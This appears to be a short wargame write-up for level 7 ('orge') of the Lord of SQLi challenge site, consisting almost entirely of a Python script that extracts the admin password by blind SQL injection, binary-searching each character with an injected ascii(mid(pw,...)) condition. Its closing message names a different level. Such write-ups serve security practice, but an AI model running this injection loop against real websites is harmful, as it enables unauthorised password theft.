Wargame/LOS(rubiya)
LOS :: 7번 ORGE
G0pher
2018. 8. 14. 13:41
WRITE UP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | import requests url = "http://los.rubiya.kr/orge_bad2f25db233a7542be75844e314e9f3.php" session = {'PHPSESSID':'MY_SESSION'} data = {} flag="" print("[∞] flag : ",end='') for i in range(1,9): a=0 b=126 while b-a!=0: center = a+(b-a)//2+1 data['pw']="'||id='admin'&&ascii(mid(pw,"+str(i)+",1))<"+str(center)+"#" res = requests.get(url, params=data, cookies=session) if "Hello admin" in res.text: b=center-1 else: a=center print(chr(a),end='') flag = flag + chr(a) data['pw']=flag res = requests.get(url, params=data, cookies = session) if "Clear!" in res.text: print("\n[♪] COBOLT Clear!") | cs |